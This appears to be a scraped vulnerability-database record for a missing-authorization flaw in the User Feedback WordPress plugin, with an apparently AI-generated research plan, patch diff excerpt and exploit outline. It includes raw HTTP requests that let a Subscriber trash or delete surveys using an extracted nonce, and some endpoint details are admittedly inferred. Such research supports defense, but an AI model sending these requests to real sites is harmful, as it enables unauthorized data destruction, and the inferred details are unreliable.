[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9mHvWV-dUrQdhywjLw9j--McKBdlPjjBYEzIuXqYQ5U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39476","user-feedback-missing-authorization-2","User Feedback \u003C= 1.10.1 - Missing Authorization","The User Feedback plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.10.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","userfeedback-lite",null,"\u003C=1.10.1","1.11.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-18 00:00:00","2026-04-15 21:23:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8fb7241f-f7fc-48c0-8111-5ceceb156f9f?source=api-prod",29,[22,23,24],"assets\u002Findex.php","assets\u002Fvue\u002Fjs\u002Faddons.js","assets\u002Fvue\u002Fjs\u002Fchunk-common.js","researched",false,3,"# Vulnerability Research Plan: CVE-2026-39476 (User Feedback \u003C= 1.10.1 - Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **User Feedback** plugin for WordPress is vulnerable to **Missing Authorization** in its survey management functionality. The plugin exposes several administrative actions (such as trashing, publishing, or duplicating surveys) via its REST API without verifying if the authenticated user possesses the necessary administrative capabilities (`manage_options`). This allows any authenticated user, including those with **Subscriber** level access, to modify or delete surveys created by administrators.\n\nBased on the provided source code in `assets\u002Fvue\u002Fjs\u002Fchunk-common.js` (specifically module `0792`), the plugin interacts with a REST API under a namespace (likely `userfeedback\u002Fv1`) to perform these actions.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash` (Inferred from JS function `g`)\n- **HTTP Method:** `POST`\n- **Authentication:** Required (Subscriber-level or higher)\n- **Payload:** JSON object containing an array of survey IDs to be trashed.\n- **Nonce:** A valid WordPress REST API nonce is required in the `X-WP-Nonce` header.\n- **Preconditions:** At least one survey must exist in the system for the attacker to target.\n\n## 3. Code Flow\n1.  **Entry Point:** The REST API endpoint `userfeedback\u002Fv1\u002Fsurveys\u002Ftrash` is registered in the backend (likely in a class handling REST routes).\n2.  **Missing Check:** The `permission_callback` for this route is either missing or uses a weak check like `is_user_logged_in()` instead of `current_user_can('manage_options')`.\n3.  **JS Trigger:** In `assets\u002Fvue\u002Fjs\u002Fchunk-common.js`, module `0792` defines the survey management functions:\n    -   `g = e => n.post(\"surveys\u002Ftrash\", { survey_ids: e })` \u002F\u002F Trashing\n    -   `h = e => n.delete(\"surveys\", { data: { survey_ids: e } })` \u002F\u002F Permanent Delete\n    -   `m = e => n.post(\"surveys\u002Fpublish\", { survey_ids: e })` \u002F\u002F Publishing\n4.  **Backend Sink:** The request reaches the survey controller, which performs database operations on the `wp_userfeedback_surveys` table (e.g., updating the `status` column to `trash`) without verifying the requester's authority.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a nonce for authenticated requests. The User Feedback plugin localizes its configuration and security tokens into a global JavaScript object.\n\n1.  **Identify Localization:** The plugin enqueues its admin scripts and localizes data. Based on common patterns in this plugin, the data is likely in `window.userfeedback`.\n2.  **Creation of Content:** The admin scripts load on User Feedback admin pages. A subscriber can access the `\u002Fwp-admin\u002F` dashboard but may not see the User Feedback menu. However, the script might still be localized.\n3.  **Extraction:**\n    -   Navigate to `\u002Fwp-admin\u002F` as a Subscriber.\n    -   Use `browser_eval` to extract the nonce:\n        ```javascript\n        browser_eval(\"window.userfeedback?.nonce || window.userfeedback_common?.nonce\")\n        ```\n    -   The exact key from localized scripts in this plugin is typically `nonce` within the `userfeedback` object.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Survey ID\nThe attacker needs the ID of a survey to trash. These can often be found by iterating IDs or checking frontend survey placements.\n\n### Step 2: Perform Unauthorized Trash Action\nUse the `http_request` tool to send a POST request to the REST API.\n\n**Request:**\n```http\nPOST \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash HTTP\u002F1.1\nHost: [TARGET_HOST]\nX-WP-Nonce: [EXTRACTED_NONCE]\nContent-Type: application\u002Fjson\n\n{\n    \"survey_ids\": [1]\n}\n```\n\n### Step 3: Alternative - Permanent Deletion\n**Request:**\n```http\nDELETE \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys HTTP\u002F1.1\nHost: [TARGET_HOST]\nX-WP-Nonce: [EXTRACTED_NONCE]\nContent-Type: application\u002Fjson\n\n{\n    \"survey_ids\": [1]\n}\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install User Feedback (userfeedback-lite) version 1.10.1.\n2.  **Create Survey:** As Admin, create a feedback survey.\n    -   `wp userfeedback create_survey --title=\"Target Survey\" --status=\"publish\"` (or use the UI).\n3.  **Create Attacker:** Create a user with the Subscriber role.\n    -   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n4.  **Confirm Survey ID:**\n    -   `wp db query \"SELECT id, title FROM wp_userfeedback_surveys;\"`\n\n## 7. Expected Results\n-   **Response:** The server should return a `200 OK` or `201 Created` status with a JSON body confirming the surveys were processed (e.g., `{\"success\": true}`).\n-   **Database Impact:** The record in `wp_userfeedback_surveys` for the target ID should have its `status` changed to `trash` or be removed entirely if the `DELETE` method was used.\n\n## 8. Verification Steps\n1.  **Check Database Status:**\n    -   `wp db query \"SELECT status FROM wp_userfeedback_surveys WHERE id = [ID]\"`\n    -   Successful exploit shows `status = 'trash'`.\n2.  **Check UI:** Navigate to the User Feedback surveys page as Admin and verify the survey is in the \"Trash\" tab.\n\n## 9. Alternative Approaches\nIf the REST API is not the direct target, the AJAX action identified in `assets\u002Fvue\u002Fjs\u002Fchunk-common.js` module `0792` may be vulnerable:\n-   **Action:** `userfeedback_google_sheets_get_auth_url`\n-   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php?action=userfeedback_google_sheets_get_auth_url`\n-   **Impact:** Unauthorized retrieval of authentication URLs for third-party integrations.\n\nHowever, the survey modification via `surveys\u002Ftrash` represents the most significant \"Missing Authorization\" impact for survey data integrity.","The User Feedback plugin for WordPress (up to version 1.10.1) fails to implement proper authorization checks on its REST API routes for survey management. This allows authenticated users with low-level privileges, such as Subscribers, to trash, delete, publish, or duplicate surveys by sending crafted requests to the plugin's API endpoints.","\u002F\u002F assets\u002Fvue\u002Fjs\u002Fchunk-common.js - Module 0792 defines interactions with vulnerable REST endpoints\n\u002F\u002F These mappings correspond to administrative actions performed via the REST API\nl=e=>n.post(\"surveys\",e).then(e=>e.data),\nc=e=>n.post(`surveys\u002F${e}\u002Fduplicate`).then(e=>e.data),\nu=e=>n.post(\"surveys\u002Frestore\",{survey_ids:e}).then(e=>e.data),\nd=e=>n.post(\"surveys\u002Fdraft\",{survey_ids:e}).then(e=>e.data),\nm=e=>n.post(\"surveys\u002Fpublish\",{survey_ids:e}).then(e=>e.data),\ng=e=>n.post(\"surveys\u002Ftrash\",{survey_ids:e}).then(e=>e.data),\nh=e=>n.delete(\"surveys\",{data:{survey_ids:e}}).then(e=>e.data)","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Fcss: admin-exclusion-banner.css\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php\t2023-01-31 17:55:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\t2026-03-11 17:04:32.000000000 +0000\n@@ -1,4 +1,8 @@\n \u003C?php\n+\n+if ( ! defined( 'ABSPATH' ) ) {\n+\texit;\n+}\n \u002F\u002F Nothing to see here\n \n header( 'HTTP\u002F1.0 403 Forbidden' );\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Fjs: admin-exclusion-banner.js\n... (truncated)","An attacker with Subscriber-level access can exploit this by first obtaining a valid WordPress REST API nonce, typically found in the localized 'userfeedback' JavaScript object on dashboard pages. By identifying the ID of an existing survey, the attacker can then send an authenticated POST request to '\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash' or a DELETE request to '\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys' with the target survey ID in the 'survey_ids' array. Because the backend fails to verify the user's capabilities (missing manage_options check), the surveys will be trashed or deleted regardless of the attacker's actual permissions.","gemini-3-flash-preview","2026-04-18 02:44:51","2026-04-18 02:46:20",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.10.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags"]